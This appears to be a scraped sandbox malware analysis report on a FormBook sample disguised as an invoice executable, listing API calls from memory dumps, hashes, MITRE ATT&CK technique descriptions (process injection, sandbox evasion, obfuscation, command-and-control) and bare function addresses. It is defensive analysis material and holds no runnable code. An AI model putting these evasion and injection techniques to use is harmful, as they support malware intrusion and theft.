Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: f26c0e247c7141c6a4161e8a4fab3d09fa7487a198c30428ee003e10d25dc4c4
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 67E01AB12002086BDB10EF49CC84EE737ADAF88650F018154BA0957241C930F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 04CCD420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,04CC7C73,?), ref: 04CCD44B

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 41b3c7fc85dc906e56a2def7d3f87553f8f86a62a9a7315bf60ffcac58630157
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: F0D05E717503042AE610FBA49C02F2672895B44A04F494078FA49962C3D954F5004162

Uniqueness

Uniqueness Score: -1.00%

Function 04CC9B23, Relevance: 1.5, APIs: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 04CC9BA2

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 300c7599e27420206f291554e94aef325a4029ea6556dd76e825ca773f6c2433
Instruction ID: 0c2ad622e80fb76f6282b924645660fb5197c7642ff6b7dbeb4d4332b67acb41
Opcode Fuzzy Hash: 300c7599e27420206f291554e94aef325a4029ea6556dd76e825ca773f6c2433
Instruction Fuzzy Hash: 72C08C70B49209AFC56085884412768F792C74A200F0002C5EC1C87600D92119B08682

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report INVOICE_90990_PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 00403019, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 00401630, Relevance: 380.6, APIs: 10, Strings: 207, Instructions: 818
memoryCOMMON

Function 004080ED, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 00406841, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Function 004067AF, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Function 00406EB1, Relevance: 4.6, APIs: 3, Instructions: 77
COMMON

Function 00405F4E, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Function 0040D3BD, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Function 004074A7, Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Function 00401120, Relevance: 1.6, APIs: 1, Instructions: 63
comCOMMON

Function 004092F9, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 004041EF, Relevance: .3, Instructions: 345
COMMONCrypto

Function 00404624, Relevance: .3, Instructions: 341
COMMONCrypto

Function 00403DBA, Relevance: .3, Instructions: 331
COMMONCrypto

Function 004039A2, Relevance: .3, Instructions: 323
COMMONCrypto

Function 004081DD, Relevance: .0, Instructions: 22
COMMON

Function 004011C0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
registryCOMMON

Function 004012C0, Relevance: 15.1, APIs: 10, Instructions: 86
fileCOMMON

Function 00408EC9, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Function 0040AB38, Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMON

Function 00405FD3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Function 00401040, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 31
stringCOMMON

Function 0040C016, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 00404DD6, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Function 00407CF6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166
COMMON

Function 004032D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON